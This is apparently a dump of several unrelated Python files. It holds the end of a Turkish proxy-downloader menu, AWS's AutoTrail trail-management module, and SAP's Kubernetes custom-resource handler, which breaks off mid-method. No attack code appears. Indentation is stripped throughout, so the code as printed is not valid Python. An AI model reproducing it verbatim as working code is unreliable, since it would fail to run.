if choice == 'N' or choice == 'n' or choice == 'no' or choice == 'No':
exit(0)
else:
print ("\033[1;33m Dogru Sekilde Yaz.")
except:
print ("\033[1;31m \n\nAn HATA.")
if __name__ == '__main__':
while True:
choice = input("\033[35m \nProxyler İndirilsinmi? [Y/n] > ")
if choice == 'Y' or choice == 'y' or choice == 'yes' or choice == 'Yes':
main()
break
if choice == 'N' or choice == 'n' or choice == 'no' or choice == 'No':
proxycheckerinit()
break
else:
print ("\033[1;33m Dogru Sekilde Yaz.")
|
trail.py
|
"""Copyright 2017-2017 Amazon.com, Inc. or its affiliates. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance with the
License. A copy of the License is located at
http://aws.amazon.com/apache2.0/
or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and
limitations under the License.
Trail management data structures and algorithms.
This module provides the Layer 1 of AutoTrail viz., the trail_manager. All layer 2 clients use the trail_manager to run
and manage a trail.
Everything below are helpers for the layer2 clients. They can be used directly, but need understanding of the internals
of AutoTrail.
"""
import logging
from collections import namedtuple
from functools import partial
from multiprocessing import Process
from multiprocessing import Queue as ProcessQueue
from Queue import Empty as QueueEmpty
from socket import SHUT_RDWR
from time import sleep
from api import get_progeny, handle_api_call, log_step, search_steps_with_states
from autotrail.core.dag import is_dag_acyclic, Step, topological_traverse, topological_while
from autotrail.core.socket_communication import serve_socket
class AutoTrailException(Exception):
"""Base exception class used for the exceptions raised by AutoTrail.
This is typically extended by other exceptions with a more specific name.
"""
pass
class CyclicException(AutoTrailException):
"""Exception raised when a given trail definition contains cycles."""
pass
StepResult = namedtuple('StepResult', ['result', 'return_value'])
def step_manager(step, trail_environment, context):
"""Manage the running of a step.
This function is meant to be run in either a separate thread or process, hence return value is found in the
result_queue.
This will:
1) Run the action function in the given Step.
2) Catch any exception it raises and return the str(Exception)
Return the result in the form of a StepResult object. The result is put in the result_queue.
The result_queue object is a multiprocess.Queue like object and the only attribute used is put(<message>).
"""
try:
log_step(logging.debug, step, 'Starting run.')
return_value = step.action_function(trail_environment, context)
step_result = StepResult(result=step.SUCCESS, return_value=return_value)
log_step(logging.info, step, 'Run successful. Return value: {}.'.format(str(return_value)))
except Exception as e:
log_step(logging.exception, step,
'Exception encountered when running the step. Error message: {}.'.format(str(e)))
if step.pause_on_fail:
step_result = StepResult(result=step.PAUSED_ON_FAIL, return_value=str(e))
else:
step_result = StepResult(result=step.FAILURE, return_value=str(e))
step.result_queue.put(step_result)
def run_step(step, context):
"""Run a given step.
1. Starts a process to run the next step.
2. Creates a queue to communicate with the process.
3. Changes the state of the Step to Step.RUN.
"""
log_step(logging.debug, step, 'Preparing objects to run.')
step.prompt_queue = ProcessQueue()
step.input_queue = ProcessQueue()
step.output_queue = ProcessQueue()
step.result_queue = ProcessQueue()
# Reset some attributes in-case the Step is being re-run.
# Older values present can be confusing to the user, so remove them.
step.prompt_messages = []
step.input_messages = []
step.return_value = None
trail_environment = TrailEnvironment(step.prompt_queue, step.input_queue, step.output_queue)
step.process = Process(target=step_manager, args=(step, trail_environment, context))
log_step(logging.debug, step, 'Starting subprocess to run step.')
step.process.start()
step.state = step.RUN
def check_running_step(step):
"""Check if the step has completed by trying to obtain its result."""
try:
step_result = step.result_queue.get_nowait()
# Step has completed, reap it.
step.state = step_result.result
step.return_value = step_result.return_value
log_step(logging.debug, step,
'Step has completed. Changed state to: {}. Setting return value to: {}'.format(
step.state, step.return_value))
if step.skip_progeny_on_failure and step.state == step.FAILURE:
skip_progeny(step)
except QueueEmpty:
# Step is still running and hasn't returned any results, hence do nothing.
pass
finally:
collect_output_messages_from_step(step)
collect_prompt_messages_from_step(step)
DONE_STATES = [
# These states are done, therefore their downstream steps can be picked up.
Step.SUCCESS,
Step.SKIPPED,
]
IGNORE_STATES = [
# Ignore the following states as these steps or their downstream cannot be run.
Step.FAILURE,
Step.BLOCKED,
]
STATE_TRANSITIONS = {
# Mapping expressing state to the corresponding transition functions.
# These functions produce side-effects by changing the state of the steps that are passed to them (if necessary).
Step.WAIT : run_step,
Step.RUN : lambda step, context: check_running_step(step),
Step.TOSKIP : lambda step, context: setattr(step, 'state', Step.SKIPPED),
Step.TOPAUSE : lambda step, context: setattr(step, 'state', Step.PAUSED),
Step.TOBLOCK : lambda step, context: setattr(step, 'state', Step.BLOCKED),
}
def trail_manager(root_step, api_socket, backup, delay=5, context=None, done_states=DONE_STATES,
ignore_states=IGNORE_STATES, state_transitions=STATE_TRANSITIONS):
"""Manage a trail.
This is the lowest layer of execution of a trail, a Layer 1 client that directly manages a trail.
Using this function directly requires no knowledge of the working of autotrail, but the requirements for using this
client should be fulfilled. They are detailed in the documentation below.
Arguments:
root_step -- A Step like object fulfilling the same contract of states it can be in. A trail is represented
by the a DAG starting at root_step. A DAG can be created from a list of ordered pairs of Step
objects using the make_dag function provided in this module.
api_socket -- A socket.socket object where the API is served. All API calls are recieved and responded via
this socket.
backup -- A call-back function to backup the state of the steps. This function should accept only one
parameter viz., the root_step. It will be called with every iteration of the main trail loop
to store the state of the DAG. Avoid making this a high latency function to keep the trail
responsive.
The return value of this function is ignored.
Ensure this function is exception safe as an exception here would break out of the trail
manager loop.
Keyword arguments:
delay -- The delay before each iteration of the loop, this is the delay with which the trail_manager
iterates over the steps it is keeping track of.
It is also the delay with which it checks for any API calls.
Having a long delay will make the trail less responsive to API calls.
context -- Any object that needs to be passed to the action functions as an argument when they are run.
done_states -- A list of step states that are considered to be "done". If a step is found in this state, it
can be considered to have been run.
ignore_states -- A list of step states that will be ignored. A step in these states cannot be traversed over,
i.e., all downstream steps will be out of traversal and will never be reached (case when a
step has failed etc).
state_transitions -- A mapping of step states to functions that will be called if a step is found in that state.
These functions will be called with 2 parameters - the step and context. Their return value is
ignored. These functions can produce side effects by altering the state of the step if needed.
Responsibilities of the manager include:
1) Run the API call server.
2) Iterate over the steps in a topological traversal based on the state_functions and ignorable_state_functions
data structures.
3) Invoked the call-back backup function to save the trail state.
4) Return when the API server shuts down.
"""
logging.debug('Starting trail manager.')
# Preparing a list of steps as these are frequently needed for serving the API calls, but topological traversal
# is expensive whereas, iteration over a list is not.
steps = list(topological_traverse(root_step))
# The trail_manager uses the topological_while function, which provides a way to traverse vertices in a topological
# order (guaranteeing the trail order) while allowing the trail_manager to control the flow.
# The topological traversal has the effect that a step is not acted upon, unless all its parents are done.
# The done_check and ignore_check call-backs allow us to tell the topological_while function if a step can be
# considered done or not.
done_check = lambda step: True if step.state in done_states else False
ignore_check = lambda step: True if step.state in ignore_states else False
step_iterator = topological_while(root_step, done_check, ignore_check)
while True:
# It is important to first serve API calls before working on steps because we want a user's request to
# affect any change before the trail run changes it.
to_continue = serve_socket(api_socket, partial(handle_api_call, steps=steps))
if to_continue is False:
logging.info('API Server says NOT to continue. Shutting down.')
api_socket.shutdown(SHUT_RDWR)
break
step = next(step_iterator, None)
if step and step.state in state_transitions:
state_transitions[step.state](step, context)
backup(root_step)
sleep(delay)
def skip_progeny(step):
"""Skip the progeny of the given step."""
for step in search_steps_with_states(get_progeny([step]), states=[Step.WAIT, Step.TOPAUSE]):
step.state = Step.SKIPPED
log_step(logging.info, step, (
'Skipping step as one of its previous steps failed and it had '
'skip_progeny_on_failure=True.'))
class TrailEnvironment(object):
"""Class that provides a run-time environment to the action functions to interact with AutoTrail.
Sometimes, at runtime, an action function may need to use some mechanisms of AutoTrail, all such mechanisms will be
provided as methods in this class.
Arguments:
prompt_queue -- multiprocessing.Queue like object which is used to send prompt messages to the user.
An action function can write to this queue and the messages will be conveyed to the user.
This is different from the output_queue in that messages in this queue will be expecting a reply.
This is like an input prompting resource for the action function, hence the name.
input_queue -- multiprocessing.Queue like object which is used to send messages to the action function.
This is like an input source for the action function, hence the name.
output_queue -- multiprocessing.Queue like object which is used to send messages to the user.
An action function can write to this queue and the messages will be conveyed to the user.
This is like an output resource for the action function, hence the name.
Messages in this queue are considered to be FYI and do not need a reply.
"""
def __init__(self, prompt_queue, input_queue, output_queue):
self.prompt_queue = prompt_queue
self.input_queue = input_queue
self.output_queue = output_queue
def input(self, prompt, timeout=None):
"""Request input from the user.
This method sends the 'prompt' as a message to the user and blocks until the user replies to the Step with the
response.
Arguments:
prompt -- String - Message to be shown the user.
Keyword Arguments:
timeout -- int - Time in seconds that this method will block for an answer from the user.
Defaults to None - block indefinitely.
"""
self.prompt_queue.put(prompt)
return self.input_queue.get(timeout=timeout)
def output(self, message):
"""Send a message to the user.
This method sends the 'message' to the user. This method does not block.
Arguments:
message -- String - Message to be shown the user.
"""
self.output_queue.put(message)
def collect_output_messages_from_step(step):
"""Collect all output messages sent by the action function in Step.
When an action function wants to send a message, it will put them in the output_queue provided to it.
This function reads all messages in the Queue and updates the Step.output_messages attribute of Step with the newly
collected messages.
Arguments:
step -- An object of type Step or similar.
Post-condition:
The following attributes of the given Step object will be updated:
output_queue -- will be drained of any messages.
output_messages -- will be appended with the messages obtained from output_queue.
"""
messages = []
while True:
try:
message = step.output_queue.get_nowait()
messages.append(message)
log_step(logging.info, step, 'Output message sent: {}'.format(str(message)))
except QueueEmpty:
break
step.output_messages.extend(messages)
def collect_prompt_messages_from_step(step):
"""Collect all prompt messages sent by the action function in Step.
When an action function wants to prompt the user for some input, it sends a message into the prompt_queue provided
to it.
This function reads all messages in the prompt Queue and updates the following attribute of Step with the
collected messages:
Step.prompt -- This is a list of all messages sent by the step so far.
Arguments:
step -- An object of type Step or similar.
Post-condition:
The following attributes of the given Step object will be updated:
prompt_queue -- will be drained of any messages.
prompt_messages -- will be appended with the messages obtained from output_queue.
"""
messages = []
while True:
try:
message = step.prompt_queue.get_nowait()
messages.append(message)
log_step(logging.info, step, 'Prompt message sent: {}'.format(str(message)))
except QueueEmpty:
break
step.prompt_messages.extend(messages)
def make_dag(trail_definition):
"""Convert a given trail definition (ordered pair representation) into a DAG.
Returns:
root_step -- obtained from the Left-hand-side of the first ordered pair.
Raises:
CyclicException -- If the trail definition contains cycles.
"""
# A trail definition using ordered pair approach will consist of a list of ordered pairs of the form:
# [
# (parent_step, child_step),
# ...
# ]
root_step, child_step = trail_definition.pop(0)
root_step.add_child(child_step)
for parent_step, child_step in trail_definition:
parent_step.add_child(child_step)
if not is_dag_acyclic(root_step):
raise CyclicException('The trail contains cycles.')
assign_sequence_numbers_to_steps(root_step)
return root_step
def assign_sequence_numbers_to_steps(root_step, tag_name='n'):
"""Assign unique numbers to each step in a trail.
A Step is a wrapper around an action function. However, for a given trail, Steps are unique while action_functions
may not be. E.g.,
def action_function_a(context):
pass
step_a1 = Step(action_function_a)
step_a2 = Step(action_function_a)
While the same action function is being referred to by the steps, they are different objects.
We need a way to uniquely refer to a step. While the 'name' tag allows us to refer to a Step using its action
function name, it is not unique.
This function iterates over the DAG in topological order and assigns a simple tag to each step
(calling it 'n' by default).
The assignment starts at the root step being 0 and the last topological step having the highest number.
Arguments:
root_step -- A Step like object which is the starting point of the DAG.
tag_name -- The name of the tag.
Defaults to 'n'.
"""
for number, step in enumerate(topological_traverse(root_step)):
step.tags[tag_name] = number
|
k8scrhandler.py
|
#!/usr/bin/env python3
# encoding: utf-8
#
# Copyright (c) 2019 SAP SE or an SAP affiliate company. All rights reserved.
#
# This file is part of ewm-cloud-robotics
# (see https://github.com/SAP/ewm-cloud-robotics).
#
# This file is licensed under the Apache Software License, v. 2 except as noted
# otherwise in the LICENSE file (https://github.com/SAP/ewm-cloud-robotics/blob/master/LICENSE)
#
"""K8s custom resource handler for robcoewmordermanager."""
import os
import re
import logging
import copy
import time
import functools
import threading
from concurrent.futures import ThreadPoolExecutor, Future
from collections import defaultdict, OrderedDict
from typing import DefaultDict, Dict, Callable, List, Optional, OrderedDict as TOrderedDict
from kubernetes import client, config, watch
from kubernetes.client.rest import ApiException
_LOGGER = logging.getLogger(__name__)
TOO_OLD_RESOURCE_VERSION = re.compile(r"too old resource version: .* \((.*)\)")
def k8s_cr_callback(func: Callable) -> Callable:
"""
Decorate a method as a K8s CR callback.
Is working only for K8sCRHandler and child classes.
"""
@functools.wraps(func)
def decorated_func(self, *args, **kwargs):
"""Provide automatic locking of CRs in process by this method."""
# Ensure that signature of K8sCRHandler._callback stays the same
name = args[0]
operation = args[2]
with self.cr_locks[name]:
_LOGGER.debug('CR "%s" locked by operation "%s"', name, operation)
try:
return func(self, *args, **kwargs)
finally:
if operation == 'DELETED':
self.cr_locks.pop(name, None)
_LOGGER.info('Method "%s" is decorated as K8s callback method', func)
return decorated_func
def parse_too_old_failure(message: str) -> Optional[int]:
"""
Parse stream watcher 'too old resource version' error.
According to https://github.com/kubernetes-client/python/issues/609.
"""
result = TOO_OLD_RESOURCE_VERSION.search(message)
if result is None:
return None
match = result.group(1)
if match is None:
return None
try:
return int(match)
except (ValueError, TypeError):
return None
class K8sCRHandler:
"""
Handle K8s custom resources.
On instance represents one controller watching changes on a single custom
resource definition.
"""
VALID_EVENT_TYPES = ['ADDED', 'MODIFIED', 'DELETED', 'REPROCESS']
REQUEST_TIMEOUT = (5, 30)
def __init__(self,
group: str,
version: str,
plural: str,
namespace: str,
template_cr: Dict,
labels: Dict) -> None:
"""Construct."""
if 'KUBERNETES_PORT' in os.environ:
_LOGGER.info('%s/%s: Handler starting "incluster_config" mode', group, plural)
config.load_incluster_config()
else:
_LOGGER.info('%s/%s: Handler starting "kube_config" mode', group, plural)
config.load_kube_config()
# Instantiate required K8s APIs
self.core_api = client.CoreV1Api()
self.crd_api = client.ApiextensionsV1beta1Api()
self.co_api = client.CustomObjectsApi()
# K8s stream watcher
self.watcher = watch.Watch()
# Configs set to specify which CRs to monitor/control
self.group = group
self.version = version
self.plural = plural
self.namespace = namespace
# Identify from CRD which method should be used to update CR status
self.get_status_update_method()
self.label_selector = ''
for k, val in labels.items():
self.label_selector += k + '=' + val + ','
self.label_selector = self.label_selector[:-1]
# Latest resource version processed by watcher
self.resv_watcher = ''
# Error counter for watcher
self.err_count_watcher = 0
# CR Cache
self._cr_cache: Dict[str, Dict] = {}
self._cr_cache_lock = threading.Lock()
self._cr_cache_initialized = False
# Callback stack for watch on cr
self.callbacks: Dict[
str, TOrderedDict[str, Callable]] = self.get_callback_dict()
self.robot_callbacks: Dict[
str, Dict[str, TOrderedDict[str, Callable]]] = {}
self.callbacks_lock = threading.Lock()
# JSON template used while creating custom resources
self.raw_cr = template_cr
# Waiting time to reprocess all custom resource if function is enabled
self.reprocess_waiting_time = 10.0
# Lock objects to synchronize processing of CRs
self.cr_locks: DefaultDict[str, threading.Lock] = defaultdict(threading.Lock)
# Dict to save thread exceptions
self.thread_exceptions: Dict[str, Exception] = {}
# Init threads
self.watcher_thread = threading.Thread(target=self._watch_on_crs_loop, daemon=True)
self.synchronize_thread = threading.Thread(
target=self._synchronize_cache_loop, daemon=True)
self.reprocess_thread = threading.Thread(target=self._reprocess_crs_loop, daemon=True)
# Control flag for thread
self.thread_run = True
self.executor = ThreadPoolExecutor(max_workers=1)
@staticmethod
def get_callback_dict() -> Dict[str, TOrderedDict[str, Callable]]:
"""Get a dictionary to store callback methods."""
callbacks: Dict[
str, TOrderedDict[str, Callable]] = {
'ADDED': OrderedDict(),
'MODIFIED': OrderedDict(),
'DELETED': OrderedDict(),
'REPROCESS': OrderedDict()
}
return copy.deepcopy(callbacks)
def get_status_update_method(self) -> None:
"""
Get status update method from CRD.
Depends on status subresource is set or unset in CRD.
"""
cls = self.__class__
name = '{}.{}'.format(self.plural, self.group)
self.status_update_method = self.co_api.patch_namespaced_custom_object
try:
api_response = self.crd_api.read_custom_resource_definition(
name, _request_timeout=cls.REQUEST_TIMEOUT)
except ApiException as err:
_LOGGER.error(
'%s/%s: Exception when calling ApiextensionsV1beta1Api->'
'read_custom_resource_definition: %s', self.group, self.plural, err)
raise
else:
_LOGGER.debug(
'%s/%s: Successfully read custom resource definition %s', self.group, self.plural,
name)
if api_response.spec.subresources is not None:
if api_response.spec.subresources.status is not None:
self.status_update_method = self.co_api.patch_namespaced_custom_object_status
_LOGGER.info('There is a status subresource defined in CRD %s', name)
return
_LOGGER.info('There is no status subresource defined in CRD %s', name)
def register_callback(
self, name: str, operations: List, callback: Callable[[str, Dict], None],
robot_name: Optional[str] = None) -> None:
"""
Register a callback function.
example cb: def callback(self, data: Dict) -> None:
"""
cls = self.__class__
with self.callbacks_lock:
# Check for invalid operations
for operation in operations:
if operation not in cls.VALID_EVENT_TYPES:
raise ValueError(
'{}/{}: "{}" is not a valid event type'.format(
self.group, self.plural, operation))
# Check if callback is callabe
if callable(callback) is False:
raise TypeError('{}/{}: Object "{}" is not callable'.format(
self.group, self.plural, callback))
# Assign the right callback attribute
log_suffix = ' for robot {}'.format(robot_name) if robot_name is not None else ''
if robot_name is None:
callbacks = self.callbacks
elif self.robot_callbacks.get(robot_name) is None:
callbacks = self.get_callback_dict()
self.robot_callbacks[robot_name] = callbacks
else:
callbacks = self.robot_callbacks[robot_name]
# Check if a callback with the same name alread existing
already_registered = False
for operation, callback_list in callbacks.items():
if name in callback_list:
already_registered = True
# Value error if callback is existing, if not register it
if already_registered:
raise ValueError(
'{}/{}: A callback with that name already registered{}'.format(
self.group, self.plural, log_suffix))
for operation in operations:
callbacks[operation][name] = callback
_LOGGER.info(
'%s/%s: Callback %s registered to operation %s%s', self.group, self.plural,
name, operation, log_suffix)
def unregister_callback(self, name: str, robot_name: Optional[str] = None) -> None:
"""Unregister a Pub/Sub order manager queue callback function."""
with self.callbacks_lock:
# Assign the right callback attribute
log_suffix = ' for robot {}'.format(robot_name) if robot_name is not None else ''
if robot_name is None:
callbacks = self.callbacks
elif self.robot_callbacks.get(robot_name) is None:
return
else:
callbacks = self.robot_callbacks[robot_name]
# Unregister callback
for operation in callbacks:
removed = callbacks[operation].pop(name, None)
if removed:
_LOGGER.info(
'%s/%s: Callback %s unregistered from operation %s%s', self.group,
self.plural, name, operation, log_suffix)
def run(self, reprocess: bool = False,
multiple_executor_threads: bool = False) -> None:
"""
Start running all callbacks.
Supporting multiple executor threads for blocking callbacks.
"""
if self.thread_run:
# Restart ThreadPoolExecutor when not running with default max_worker=1
if multiple_executor_threads:
self.executor.shutdown()
self.executor = ThreadPoolExecutor(max_workers=5)
_LOGGER.info(
'Watching for changes on %s.%s/%s', self.plural, self.group, self.version)
self.watcher_thread.start()
# Wait until cache is initialized
while self._cr_cache_initialized is False:
time.sleep(0.01)
self.synchronize_thread.start()
if reprocess:
self.reprocess_thread.start()
else:
_LOGGER.error(
'Runner thread for %s/%s is currently deactivated', self.group, self.plural)
def _cache_custom_resource(self, name: str, operation: str, custom_res: Dict) -> None:
"""Cache this custom resource."""
with self._cr_cache_lock:
if operation in ('ADDED', 'MODIFIED'):
self._cr_cache[name] = custom_res
elif operation == 'DELETED':
self._cr_cache.pop(name, None)
def _refresh_custom_resource_cache(self) -> Dict[str, Dict]:
"""Refresh custom resource cache from a list with custom resources."""
_LOGGER.debug("Refreshing custom resource cache")
with self._cr_cache_lock:
cr_resp = self._list_all_cr()
crs = cr_resp['items']
cr_cache = {}
for obj in crs:
metadata = obj.get('metadata')
if not metadata:
continue
name = metadata['name']
cr_cache[name] = obj
self._cr_cache = cr_cache
return cr_resp
def _synchronize_cache_loop(self) -> None:
"""Synchronize custom resource cache every 5 minutes."""
while self.thread_run:
time.sleep(300)
try:
self._refresh_custom_resource_cache()
except Exception as err: # pylint: disable=broad-except
_LOGGER.error(
'%s/%s: Error refreshing CR cache: %s', self.group, self.plural, err,
exc_info=True)
# On uncovered exception in thread save the exception
self.thread_exceptions['cr-cache-synchronizer'] = err
# Stop the watcher
self.stop_watcher()
@k8s_cr_callback
def _callback(self, name: str, labels: Dict, operation: str, custom_res: Dict) -> None:
"""Process custom resource operation."""
robot_name = labels.get('cloudrobotics.com/robot-name', '')
# Run all registered callback functions
with self.callbacks_lock:
callbacks = list(self.callbacks[operation].values())
if self.robot_callbacks.get(robot_name) is not None:
callbacks.extend(self.robot_callbacks[robot_name][operation].values())
try:
for callback in callbacks:
callback(name, custom_res)
except Exception as err: # pylint: disable=broad-except
_LOGGER.error(
'%s/%s: Error in callback when processing CR %s: %s', self.group, self.plural,
name, err, exc_info=True)
else:
_LOGGER.debug(
'%s/%s: Successfully processed custom resource %s', self.group, self.plural, name)
def _watch_on_crs(self) -> None:
"""Stream events on orders and execute callbacks."""
_LOGGER.info(
'%s/%s: Starting watcher at resourceVersion "%s"',
self.group, self.plural, self.resv_watcher)
try:
self.watcher = watch.Watch()
stream = self.watcher.stream(
self.co_api.list_namespaced_custom_object,
self.group,
self.version,
self.namespace,
self.plural,
label_selector=self.label_selector,
resource_version=self.resv_watcher
)
for event in stream:
# Break loop when thread stops
if not self.thread_run:
break
# Process event
obj = event['object']
operation = event['type']
# Too old resource version error handling
# https://github.com/kubernetes-client/python/issues/609
# Outdated from python API version 12 which includes this PR
# https://github.com/kubernetes-client/python-base/pull/133/files
# No an ApiException is raised instead
if obj.get('code') == 410:
new_version = parse_too_old_failure(obj.get('message'))
if new_version is not None:
self.resv_watcher = str(new_version)
_LOGGER.error(
'Updating resource version to %s due to "too old resource version" '
'error', new_version)
# CRD could be the reason for a too old resource version error
# Refresh status update method
self.get_status_update_method()
break
# Skip CRs without a spec or without metadata
metadata = obj.get('metadata')
if not metadata:
continue
if metadata.get('resourceVersion'):
self.resv_watcher = metadata['resourceVersion']
name = metadata['name']
labels = metadata.get('labels', {})
_LOGGER.debug(
'%s/%s: Handling %s on %s', self.group, self.plural,
operation, name)
# Cache custom resource
self._cache_custom_resource(name, operation, obj)
# Submit callbacks to ThreadPoolExecutor
self.executor.submit(self._callback, name, labels, operation, obj)
except ApiException as err:
if err.status == 410:
new_version = parse_too_old_failure(err.reason)
if new_version is not None:
self.resv_watcher = str(new_version)
_LOGGER.error(
'Updating resource version to %s due to "too old resource version" '
'error', new_version)
# CRD could be the reason for a too old resource version error
# Refresh status update method
self.get_status_update_method()
return
# If resource version could not be updated, reset it to allow a clean restart
self.resv_watcher = ''
_LOGGER.error(
'%s/%s: Exception when watching CustomObjectsApi: %s',
self.group, self.plural, err)
# On unknown errors backoff for a maximum of 60 seconds
self.err_count_watcher += 1
backoff = min(60, self.err_count_watcher)
_LOGGER.info('%s/%s: Backing off for %s seconds', self.group, self.plural, backoff)
time.sleep(backoff)
else:
# Reset error counter
self.err_count_watcher = 0
def _init_watcher(self) -> None:
"""Initialize CR watcher."""
# Sync cache
cr_resp = self._refresh_custom_resource_cache()
self._cr_cache_initialized = True
_LOGGER.debug(
'%s/%s: Initialize CR watcher: Got all CRs. Cache synced', self.group, self.plural)
if cr_resp:
# Set resource version for watcher to the version of the list. According to
# https://github.com/kubernetes-client/python/issues/693#issuecomment-442893494
# and https://github.com/kubernetes-client/python/issues/819#issuecomment-491630022
resource_version = cr_resp.get('metadata', {}).get('resourceVersion')
if resource_version is None:
_LOGGER.error('Could not determine resourceVersion. Start from the beginning')
self.resv_watcher = ''
else:
self.resv_watcher = resource_version
# Process custom resources
for obj in cr_resp['items']:
metadata = obj.get('metadata')
if not metadata:
continue
name = metadata['name']
labels = metadata.get('labels', {})
# Submit callbacks to ThreadPoolExecutor
self.executor.submit(
self._callback, name, labels, 'ADDED', obj)
def _watch_on_crs_loop(self) -> None:
"""Start watching on custom resources in a loop."""
_LOGGER.info(
'%s/%s: Start watching on custom resources', self.group, self.plural)
while self.thread_run:
try:
if self.resv_watcher == '':
self._init_watcher()
self._watch_on_crs()
except Exception as err: # pylint: disable=broad-except
_LOGGER.error(
'%s/%s: Error reprocessing custom resources: %s', self.group, self.plural, err,
exc_info=True)
# On uncovered exception in thread save the exception
self.thread_exceptions['watcher'] = err
# Stop the watcher
self.stop_watcher()
finally:
if self.thread_run:
_LOGGER.debug('%s/%s: Restarting watcher', self.group, self.plural)
_LOGGER.info("Custom resource watcher stopped")
def update_cr_status(self, name: str, status: Dict) -> None:
"""Update the status field of named cr."""
cls = self.__class__
custom_res = {'status': status}
try:
self.status_update_method(
self.group,
self.version,
self.namespace,
self.plural,
name,
custom_res,
_request_timeout=cls.REQUEST_TIMEOUT)
except ApiException as err:
_LOGGER.error(
'%s/%s: Exception when updating CR status of %s: %s', self.group, self.plural,
name, err)
raise
else:
_LOGGER.debug(
'%s/%s: Successfully updated status of CR %s', self.group, self.plural, name)
def update_cr_spec(
self, name: str, spec: Dict, labels: Optional[Dict] = None,
owner_cr: Optional[Dict] = None) -> None:
"""Update the status field of named cr."""
cls = self.__class__
custom_res = {'spec': spec}
# Optionally change labels
if labels is not None:
custom_res['metadata'] = {'labels': labels}
if owner_cr is not None:
custom_res = self.set_controller_reference(custom_res, owner_cr)
# Optionally add controller reference
try:
self.co_api.patch_namespaced_custom_object(
self.group,
self.version,
self.namespace,
self.plural,
name,
custom_res,
_request_timeout=cls.REQUEST_TIMEOUT)
except ApiException as err:
_LOGGER.error(
'%s/%s: Exception when updating CR spec of %s: %s', self.group, self.plural,
name, err)
raise
else:
_LOGGER.debug(
'%s/%s: Successfully updated spec of CR %s', self.group, self.plural, name)
def delete_cr(self, name: str) -> None:
"""Delete specific custom resource by name."""
cls = self.__class__
try:
self.co_api.delete_namespaced_custom_object(
self.group,
self.version,
self.namespace,
self.plural,
name,
_request_timeout=cls.REQUEST_TIMEOUT)
except ApiException as err:
_LOGGER.error(
'%s/%s: Exception when deleting CR of %s: %s', self.group, self.plural,
name, err)
raise
else:
_LOGGER.debug(
'%s/%s: Successfully deleted CR %s', self.group, self.plural, name)
def create_cr(
self, name: str, labels: Dict, spec: Dict, owner_cr: Optional[Dict] = None) -> None:
"""Create custom resource on 'orders' having json parameter as spec."""
cls = self.__class__
custom_res = copy.deepcopy(self.raw_cr)
custom_res['metadata']['name'] = name
custom_res['metadata']['labels'] = labels
custom_res['spec'] = spec
if owner_cr is not None:
custom_res = self.set_controller_reference(custom_res, owner_cr)
try:
self.co_api.create_namespaced_custom_object(
self.group,
self.version,
self.namespace,
self.plural,
custom_res,
_request_timeout=cls.REQUEST_TIMEOUT)
except ApiException as err:
_LOGGER.error(
'%s/%s: Exception when creating CR %s: %s', self.group, self.plural, name, err)
raise
else:
_LOGGER.debug(
'%s/%s: Successfully created CR %s', self.group, self.plural, name)
def get_cr(self, name: str, use_cache: bool = True) -> Dict:
"""Retrieve a specific custom resource by name."""
cls = self.__class__
if use_cache is True:
try:
return copy.deepcopy(self._cr_cache[name])
except KeyError as err:
_LOGGER.error(
'%s/%s: Exception when retrieving CR %s: not found', self.group, self.plural,
name)
raise ApiException(status=404) from err
try:
api_response = self.co_api.get_namespaced_custom_object(
self.group,
self.version,
self.namespace,
self.plural,
name,
_request_timeout=cls.REQUEST_TIMEOUT)
except ApiException as err:
_LOGGER.error(
'%s/%s: Exception when retrieving CR %s: %s', self.group, self.plural, name, err)
raise
else:
_LOGGER.debug(
'%s/%s: Successfully retrieved CR %s', self.group, self.plural, name)
return api_response
def check_cr_exists(self, name: str, use_cache: bool = True) -> bool:
"""Check if a cr exists by name."""
cls = self.__class__
if use_cache is True:
return bool(self._cr_cache.get(name))
try:
self.co_api.get_namespaced_custom_object(
self.group,
self.version,
self.namespace,
self.plural,
name,
_request_timeout=cls.REQUEST_TIMEOUT)
except ApiException as err:
if err.status == 404:
return False
_LOGGER.error(
'%s/%s: Exception when retrieving CR %s: %s', self.group, self.plural, name, err)
raise
else:
return True
def list_all_cr(self, use_cache: bool = True) -> List[Dict]:
"""List all currently available custom resources of a kind."""
if use_cache is True:
return copy.deepcopy(list(self._cr_cache.values()))
return self._list_all_cr().get('items', [])
def _list_all_cr(self) -> Dict:
"""List all currently available custom resources of a kind internally."""
cls = self.__class__
try:
api_response = self.co_api.list_namespaced_custom_object(
self.group,
self.version,
self.namespace,
self.plural,
label_selector=self.label_selector,
_request_timeout=cls.REQUEST_TIMEOUT
)
except ApiException as err:
_LOGGER.error(
'%s/%s: Exception when listing of CRs: %s', self.group, self.plural, err)
raise
else:
_LOGGER.debug(
'%s/%s: Successfully listed all CRs', self.group, self.plural)
return api_response
def process_all_crs(self) -> None:
"""
Reprocess custom resources.
This method processes all existing custom resources with the given operation.
"""
_LOGGER.debug('%s/%s: CR reprocess started', self.group, self.plural)
with self._cr_cache_lock:
crs = copy.deepcopy(list(self._cr_cache.values()))
futures: List[Future] = []
for obj in crs:
metadata = obj.get('metadata')
if not metadata:
continue
name = metadata['name']
labels = metadata.get('labels', {})
# Submit callbacks to ThreadPoolExecutor
futures.append(self.executor.submit(
self._callback, name, labels, 'REPROCESS', obj))
# Wait for all futures
for future in futures:
future.result()
def _reprocess_crs_loop(self) -> None:
"""Reprocess existing custom resources in a loop."""
_LOGGER.info(
'Start continiously reprocessing existing custom resources')
last_run = time.time()
while self.thread_run:
try:
self.process_all_crs()
except Exception as err: # pylint: disable=broad-except
_LOGGER.error(
'%s/%s: Error reprocessing custom resources: %s', self.group, self.plural, err,
exc_info=True)
self.thread_exceptions['reprocessor'] = err
# Stop the watcher
self.stop_watcher()
finally:
# Wait up to self.reprocess_waiting_time seconds
if self.thread_run:
time.sleep(max(0, last_run - time.time() + self.reprocess_waiting_time))
last_run = time.time()
_LOGGER.info("Reprocessing custom resources stopped")
def stop_watcher(self) -> None:
"""Stop watching CR stream."""
self.thread_run = False
_LOGGER.info('Stopping watcher for %s/%s', self.group, self.plural)
self.watcher.stop()
_LOGGER.info('Stopping ThreadPoolExecutor')
self.executor.shutdown(wait=False)
def add_finalizer(self, name: str, finalizer: str) -> bool:
"""Add a finalizer to a CR."""
cls = self.__class__
if self.check_cr_exists(name):
# Get current finalizers
cr_resp = self.get_cr(name)
finalizers = cr_resp['metadata'].get('finalizers', [])
